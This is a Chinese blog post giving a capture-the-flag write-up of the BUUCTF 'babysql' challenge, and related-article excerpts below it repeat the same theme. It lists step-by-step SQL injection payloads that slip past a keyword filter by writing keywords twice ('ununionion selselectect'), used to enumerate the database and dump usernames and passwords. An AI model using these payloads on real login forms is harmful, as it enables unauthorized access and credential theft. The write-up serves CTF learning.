buuctf(babysql)(双写绕过)

最新推荐文章于 2024-03-28 00:22:57 发布
最新推荐文章于 2024-03-28 00:22:57 发布
阅读量204 收藏 2
点赞数
文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_75005708/article/details/130063719
版权

1.我们打开环境之后发现是一个登陆页面,先尝试一下万能密码登录

admin

1’ or 1=1#

 我们可以看出是字符型注入,然后我们再把or换成||看看结果是不是一样的

1‘ || 1=1#

 然后我们就发现登陆成功,应该是or被过滤了,我们要双写绕过它,我们接着查看它的列数

1' oorrder bbyy 3# 只有三列 4会报错

我们接着爆出它的显示位

1' ununionion selselectect 1,2,3#

 我们发现2和3在页面显示,接着查看它的数据库

 1' ununionion selselectect 1,2,database()#   这里把3换成database是因为3在页面显示,我们也可以把2换成database

发现它的数据库名称是geek,接着看表

1' ununionion seselectlect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema='geek'#

如果我们在尝试这条语句的时候,发现报错,可能是环境的问题,我们用括号把information到tables括起来就不用空格了,一般情况下是不会有问题

group_concat是全部显示,limit是只显示特定的

 我们发现有俩张表,我们先查看第一张表,看看有什么内容,不行再换第二张表

1' ununionion selselectect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name='b4bsql'#

 这里可能出现我们想要的内容,接着查询

 1' ununionion selselectect 1,2,group_concat(concat_ws(id,username,passwoorrd)) frfromom geek.b4bsql#

1' ununionion selselectect 1,2,group_concat(username,id,passwoorrd) frfromom geek.b4bsql#

concat_ws是将id置于中间,我们也可以手动将它在中间,隔开usernmae和password

俩条语句都可以,最终都可以拿到答案

这道题最明显的是双写绕过,然后我们需要去拼接双写语句达到绕过的目的,双写的方式也不一定是固定的,这道题在我们尝试的时候也会发现其实它也过滤好几个单词,有时候我们需要部分双写,也不需要整个单词双写,因为它不是整个单词都过滤

芝诺的乌龟M
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[极客大挑战 2019]BabySQL
qq_45237160的博客
01-12 356
我们首先用万能密码尝试登录,提示我们账号或者密码错误,可以证明 符号 or并没有起作用,应该是被过滤掉了,也证明了此处仍然存在注入点。然后爆表,这里试了好多次,一直以为information和schema也被过滤了,后来发现并没有,过滤的还是or,from也被过滤了。接下来联合查询进行查询回显的点,仍然报错 ,根据报错信息可知:union,select都被过滤为空了。访问链接,我们看到熟悉的界面,不过页面上的提示内容变了,告诉了我们这里会有过滤。仍然复绕过,得到回显点,2和3处。
[极客大挑战 2019]BabySQL1 思路细致讲解
hac1ker123的博客
05-19 717
[极客大挑战 2019]BabySQL1 思路细致讲解
BabySQL【2019极客大挑战】
I_WORM的博客
03-28 1087
构造payload:username=3'+||+extractvalue(1,concat(0x7e,mimidd((seselectlect+group_concat(username,':',passwoorrd)+frfromom+b4bsql)+,181,30),0x7e))=1--+发现返回了完整的错误提示,一开始没明白是什么意思,更换payload测了几次后才发觉or应该被过滤了,尝试了or 'a'='a'--+ or '1'='1' --+;既然能成功注入了,又获得了完整的错误提示。
极客大挑战2019babysql
kindyyy的博客
04-08 1323
我也是参考了大佬的wp才会做的题目..... 大佬博客:[极客大挑战 2019]BabySQL - 云千 - 博客园 (对我自己来说)要一步一步的从查库,查表,查列,查字段慢慢来,从这道题我们还要注意有些命令是会被注释的,可以用双绕过。 大概就是这样。先看题目吧: ...
BUUCTF逆向前八题
01-24
在本篇中,我们将探讨在BUUCTF储备赛中遇到的前八道逆向题目,通过这些题目来学习如何使用逆向工具,如exeinfo和IDA,以及如何解析汇编代码以获取关键信息。 1. Easyre: 这道题首先使用exeinfo查看文件信息,确认...
BasicASM.s(BUUCTF
06-04
分析过程文件
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
【变量覆盖漏洞详解】 ...这类漏洞通常出现在以下几种情况: 1. **全局变量覆盖**: ...攻击者可以通过操纵这些请求参数来覆盖预定义的变量,造成安全风险。... ...2. **extract()函数使用不当**: `extract()`函数会从数组中...
BUUCTF题目(含工具),你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分
最新发布
04-09
BUUCTF题目(含工具),你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分
BUUCTF】MISC zip
01-20
import zipfile import string import binascii def CrackCrc(crc): for i in dic: for j in dic: for p in dic: for q in dic: s = i + j + p + q if crc == (binascii.crc32(s.encode())): ...
极客大挑战 2019BabySQL(手动sql注入)
4pri1
02-06 878
[极客大挑战 2019]BabySQL,熟悉的界面,这个题的第三次变体了吧 [极客大挑战 2019]BabySQL(手动sql注入) [极客大挑战 2019]BabySQL,熟悉的界面,这个题的第三次变体了吧 试一下万能密码 本来打算直接抓包的,看到一位师傅,直接给双绕过了,试了试果然有用(还把+给过滤了1=1–+用不了了) 接下来和原来的操作基本一样,继续手动注入【别忘了双绕过!】 按照2019lovesql那个的完全一样,再试一遍 用order by或者union .
BUUCTF-sql双绕过
m0_64180167的博客
04-06 612
打开环境 查看什么类型输入字符型我们开始尝试万能密码发现返回的东西和我们输入不一样 or没了过滤了or这个是关键 我们使用双绕过得到了账号密码我们开始sql注入发现or 过滤了 我们看看还是报错 我们接着看看是不是过滤了 by 因为如果过滤了der 他会返回or成功了 三个字段我们开始爆破数据库得到数据库名 geek开始爆表开始爆数据都是返回这些名得到flag。
登录过滤功能实现总结
执笔浮云的博客
12-02 158
可以使用spring提供的路径匹配器来对路径进行匹配,对复合要求的予以放行,其他页面需要处于登录才予以放行。当访问部分网页的时候,必须处于登录状态,如果没有处于登录状态,则跳转到登录页面,可以使用过滤器来实现。具体实现范例代码如下。
CTF学习笔记——[极客大挑战 2019]BabySQL
Obs_cure的博客
02-09 1392
一、[极客大挑战 2019]BabySQL 1.题目 2.解题步骤 一看就知道是之前一个系列的题,可惜并不耽误我不会做… 在尝试的时候报错是看不懂的,这里简单记述一下心路历程。SQL注入的题目自然是1' or 1=1 # 结果很奇怪 这里在看过WP才知道是把or过滤掉了才有这样的回显。很明显我注入的东西和回显出来的东西不一样。那么是什么过滤呢,从这样的回显来看,是把or替换成了空白。师傅们的做法是双。就是改成oorr。匹配的时候会把中间的替换成空 然后外面的再组成or。双绕过学会了) 接下来就是常
sql联合注入步骤例题LoveSQL 和 BabySQL(双绕过
qq_58970968的博客
04-04 1287
拿到题目有登录界面 1.想到万能密码: 1' or 1=1# 发现登录成功;但是拿到这个页面毫无卵用;浪费时间,由于是一道考sql注入的题,想到后台肯定有表字段这些,flag就藏在里面,爆出他们就行了; 2:查有多少字段: 1'order by 4# 这时报错,说明有三个字段, 3.有三个字段之后在看回显,也就是说看显示的是哪几个字段;: 1' union select 1,2,3# 回显了2和3;回显字段为第二个和第三个; 4.然后爆数据库名: 1' union select .
buu web:[极客大挑战 2019]BabySQL(sql注入双绕过
m0_55378150的博客
04-18 3027
打开靶场,熟悉的界面 依旧是先上万能密码 1' or 1=1# 1' or 1=1# 好家伙,直接就给你报错了,可以看到,or被它过滤掉了,所以我们尝试一下双绕过 1' oorr 1=1# 1' oorr 1=1# 成功登录! 可以拿admin回去登录界面继续注入了,先爆字段 admin' oorrder by 2#(密码随便输) 提示在字段数附近有报错,猜测可能是by也被过滤了,依旧是双绕过 admin' oorrder bbyy 2# 可以的,通过...
ctf /**/与双 绕过sql过滤
qq_43943098的博客
07-11 3678
注意: 本博客可能转载了多处文章内容,所有转载内容均会标明出处,谢谢!! 0.在文章开始之前的话 本人也这是刚刚接触数据库这一块不过一周的时间,在此之前都是普通的码奴,所以对sql的命令或者语句有着错误的理解,请各位dalao海涵并在评论里指出。 1.浅谈我对sql和sql注入的理解 所谓sql,其原名是结构话查询语句,对于这个结构化我首先想到的是Linux里大部分的命令都带有的 -型的参数,再则...
buuctf 极客大挑战 babysql
SopRomeo的博客
01-17 1678
emmmmm这道题,常规注入不可行,很明显过滤了什么字符,我试了下双,没想到可行。。 接着就直接上图吧 跟之前lovesql差不多
SQL注入篇——WAf绕过
爱国小白帽
02-11 1664
WAF是什么? Web应用防护系统(也称:网站应用级入侵防御系统。英文:Web Application Firewall,简称: WAF)。也叫Web防火墙,主要是对Web特有入侵方式的加强防护,如DDOS防护、SQL注入、XML注入、XSS等。 Waf分类 代码WAF 软件WAF 硬件WAF 云WAF Sql注入绕waf常用方式 大小混合 uNIoN sELecT 1,2,3,4 2...
buuctf请求过快
08-26
我很抱歉,根据提供的引用内容,我找不到关于"buuctf请求过快"的相关信息。请提供更多信息或者明确您的问题,我将尽力为您提供帮助。<span class="em">1</span><span class="em">2</span><span class="em">3 #### ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值